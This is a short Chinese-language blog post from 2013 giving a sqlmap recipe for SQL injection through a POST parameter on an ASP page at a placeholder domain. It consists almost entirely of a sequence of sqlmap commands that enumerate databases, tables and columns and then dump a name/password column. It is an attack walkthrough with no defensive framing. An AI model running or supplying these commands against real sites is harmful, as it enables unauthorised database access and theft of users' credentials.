sqlmap---post----注入

先抓包

http://zzzzz.com/xx/xx_list.asp?action=list

bm=%C6%BD%C3%E6%B2=sss&xx=sss

-------------------------------------------------------------------------------------------------------------------------------------

sqlmap.py -u http://zzzzz.com/xx/xx_list.asp?action=list --data=bm=%C6%BD%C3%E6%B2

sqlmap.py -u http://zzzzz.com/xx/xx_list.asp?action=list --data=bm=%C6%BD%C3%E6%B2 --dbs                 //列数据库

sqlmap.py -u http://zzzzz.com/xx/xx_list.asp?action=list --data=bm=%C6%BD%C3%E6%B2 -D 库名 --table   //查看指定库的表

sqlmap.py -u http://zzzzz.com/xx/xx_list.asp?action=list --data=bm=%C6%BD%C3%E6%B2 -D 库名 -T 表中指定的字段 --columns   //列字段

sqlmap.py -u http://zzzzz.com/xx/xx_list.asp?action=list --data=bm=%C6%BD%C3%E6%B2 -D 库名 -T 表中指定的字段 -C "name.password" --dump       //看字段内容

posted on 2013-02-23 00:51 0xcc 阅读(1765) 评论(0) 编辑收藏举报

刷新页面返回顶部

0xcc

sqlmap---post----注入

导航

公告